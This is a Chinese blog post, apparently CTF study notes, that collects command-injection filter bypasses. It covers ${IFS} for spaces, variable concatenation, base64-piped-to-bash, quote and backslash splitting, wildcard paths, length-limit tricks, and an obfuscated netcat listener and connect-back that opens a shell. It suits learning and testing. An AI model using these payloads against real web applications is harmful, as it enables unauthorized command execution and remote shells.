前言

命令注入是web中常見(jiàn)的漏洞之一，由于web應(yīng)用程序未對(duì)用戶提交的數(shù)據(jù)做嚴(yán)格的過(guò)濾，導(dǎo)致用戶輸入可以直接被linux或windows系統(tǒng)當(dāng)成命令執(zhí)行，一般都會(huì)造成嚴(yán)重的危害。

常用符號(hào)

分號(hào)(;)

多條語(yǔ)句順序執(zhí)行時(shí)的分割符號(hào)。

1

cmd1;cmd2

管道符(|)

cmd1命令的輸出，作為下一條命令cmd2的參數(shù)。

1

cmd1|cmd2

and(&&)

與命令，cmd1成功則執(zhí)行cmd2，cmd1失敗則不執(zhí)行cmd2

1	cmd1 && cmd2

or(||)

或命令，cmd1失敗則執(zhí)行cmd2，cmd1成功則不執(zhí)行cmd2

1	cmd1 || cmd2

反引號(hào)()和$()

反引號(hào)和$()都可用來(lái)表示命令，被這兩種方式包含的字符串都會(huì)被當(dāng)做命令首先執(zhí)行。

12	echo "result : `whoami`"echo "result : $(whoami)"

繞過(guò)方式總結(jié)

空格繞過(guò)

在過(guò)濾了空格的系統(tǒng)中，以cat flag.txt為例，系統(tǒng)不允許我們輸入空格或輸入后被過(guò)濾。

${IFS}

可使用${IFS}代替空格。

123	cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt

重定向符繞過(guò)(<>)

12	cat<>flag.txtcat

%09(需要php環(huán)境)

php環(huán)境下web輸入%09等效于空格

1	cat%09flag.txt

黑名單繞過(guò)

拼接

使用shell變量拼接被黑名單限制的關(guān)鍵詞

1	a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;

base64

使用反引號(hào)包含base64解碼后的命令

1	`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`

將base64解碼后的命令通過(guò)管道符傳遞給bash

1	echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash

單引號(hào)，雙引號(hào)

1	c""at fl''ag.tx""t

反斜杠

1	c\at fl\a\g.tx\t

$1

1	ca$1t fl$1ag.t$1xt

讀文件繞過(guò)

123456789101112

(1)more:一頁(yè)一頁(yè)的顯示檔案內(nèi)容(2)less:與 more 類似，但是比 more 更好的是，他可以[pg dn][pg up]翻頁(yè)(3)head:查看頭幾行(4)tac:從最后一行開(kāi)始顯示，可以看出 tac 是 cat 的反向顯示(5)tail:查看尾幾行(6)nl：顯示的時(shí)候，順便輸出行號(hào)(7)od:以二進(jìn)制的方式讀取檔案內(nèi)容(8)vi:一種編輯器，這個(gè)也可以查看(9)vim:一種編輯器，這個(gè)也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:報(bào)錯(cuò)出具體內(nèi)容

通配符繞過(guò)

/???會(huì)去尋找 / 目錄下的三個(gè)字符長(zhǎng)度的文件，正常情況下會(huì)尋找到/bin，然后/?[a][t]會(huì)優(yōu)先匹配到/bin/cat,就成功調(diào)用了cat命令，然后后面可以使用正常的通配符匹配所需讀的文件，如flag.txt文件名長(zhǎng)度為8，使用8個(gè)?’’，此命令就會(huì)讀取所有長(zhǎng)度為8的文件。

1	/???/?[a][t] ?''?''?''?''?''?''?''?''

同理，我們也可以匹配/bin下的其他命令，如more，less，vi，tail等命令來(lái)查看文件，或者執(zhí)行其他命令。

1	/???/[m][o]?[e] ?''?''?''?''?''?''?''?''

1	/???/[t]?[i][l] ?''?''?''?''?''?''?''?''

甚至開(kāi)啟一個(gè)shell

1	/???/[n]?[t]??[t] -lvp 4444

1	/???/[n]?[t]??[t] 192.168.1.3 4444

命令嵌套

1	echo "result:`whoami`"

1	echo "result:$(uname -a)"

長(zhǎng)度繞過(guò)

使用>>繞過(guò)長(zhǎng)度限制

使用>>每次添加一部分命令到文件中

1234	echo -n "cmd1" > r;echo -n "cmd2" >> r;echo -n "cmd3" >> r;echo "cmd4" >> r;

然后使用cat r | bash執(zhí)行命令

使用換行執(zhí)行和ls -t繞過(guò)長(zhǎng)度限制

linux中，文件中的命令如果需要換行書(shū)寫(xiě)，需要在前一行末尾增加\，如文件a中有

123	ca\t flag.t\xt

使用sh a即可執(zhí)行命令cat flag.txt

ls -t可根據(jù)時(shí)間創(chuàng)建順序逆序輸出文件名

a可以創(chuàng)建一個(gè)名為a的文件

按照這個(gè)思路，可以使用

1234	> "ag"> "fl\\"> "t \\"> "ca\\"

然后使用ls -t > s

s中文件內(nèi)容就是

123456

sca\t \fl\ag\其他的無(wú)關(guān)內(nèi)容

之后使用sh s，即可執(zhí)行cat flag

作者：Leticia，來(lái)源：Leticia's Blog

一如既往的學(xué)習(xí)，一如既往的整理，一如即往的分享。感謝支持

“如侵權(quán)請(qǐng)私聊公眾號(hào)刪文”

覺(jué)得不錯(cuò)點(diǎn)個(gè)“贊”、“在看”哦

總結(jié)

以上是生活随笔為你收集整理的命令注入_命令注入绕过方式总结 (20210111学习笔记)的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。